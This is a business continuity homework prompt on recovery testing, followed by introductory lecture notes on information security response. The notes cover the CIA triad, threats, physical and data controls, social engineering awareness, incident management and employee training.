Bus Cont Plan&Disas Recov Plan 13
A simulated disaster and comprehensive recovery test may involve many of an organization’s key personnel for several days: is this a reasonable burden to place on a busy, competitive company? How would you argue against the inevitable tendency to shortcut the procedure?
350 -400 words .
Chapter 19: information security response
Security plans
Physical security
Logical security
Encryption
Proper disposal of assets
Policies and training to guide employees
What to protect
Information security protects three aspects of data systems – CIA
Confidentiality – only authorized access is permitted
Integrity – protect against unauthorized alteration
Availability – data systems and data are available
Ways to improve Availability: UPS, RAID, Clustering critical servers, install failover capability
Information security risks
Threats
Vulnerabilities
controls
threats
Malicious hackers
Bored students
Unhappy employees
Helpful employees
Thieves
Lazy engineers
Hardware failure
vulnerabilities
A Threat that exploits to attach your company
Gap in protection methods
Scan regularly for vulnerabilities
controls
Preventative actions taken to stop an attack
Warning sensors
Technical solutions
Administrative actions to reduce vulnerabilities
Physical security
Fence around company’s buildings
Locked doors
Locked door on data center
Technical security
User ID and passwords
Access control list (ACL)
Controls on routers and wireless access points
Change default passwords
Lock down equipment
Data security
Types of Data:
Personally identifiable information (PII)
Student records
Medical records
Credit card or check numbers
Data security – cont’d
Protect Data:
Encrypt all portable data
Incoming and outgoing data much be encrypted using a company-approved standard
Disable USB ports
All devices mush be physically destroyed
Company documents shredded
Implement a clean desk policy
Screen saver time-out and password protected
Social engineering
Phone call from someone claiming to be Help Desk asking for ID information
Official-looking person claiming to be repairman
Hacker who search online social media looking for IT people at certain company
Person walking behind an employee towards a security door
Caller pretending to be vendor
Person quietly watching over someone’s shoulder
Dumpster diver
Incident management
Details the initial action steps necessary to:
Stop the intrusion
Contain the damage
Gather evidence as to the source
Objectives
Actual impact
Plan contents
Confirm the incident is not a false positive
Activate the response team
Open the telephone bridge
Assess the situation
Incident management team checks rest of IT systems for potential break-ins
Incident after-action review
Conduct a review within a few days of incident
Format for review questions:
What happened?
What should have happened?
What went well?
What did not go well?
What will be done differently next time?
Testing the response plan
Test the plan with the team regularly
Testing updates to the procedures
Testing for new team members
Testing may help to determine false-positives
Preserving forensic evidence
Types of evidence to collect:
Photographs
Time difference on each device
Hash of every data set
System log files
Establishing policies
Typical policies include:
Incident response
Acceptable use
Acceptable use policy should address:
Social engineering
Password management
User ID
Data policy
Patching policy
Educating employees
Employees are the number-one security threat
Essential that all employees are trained
Users should understand the importance of proper data disposal
Ongoing user awareness program
Verify training through exams
summary
Information security is an important part of the BCP
Information security requires constant vigilance to prevent criminal activity
Incident response planning must be completed before it is needed
.MsftOfcThm_Accent1_Fill {
fill:#4472C4;
}
.MsftOfcThm_Accent1_Stroke {
stroke:#4472C4;
}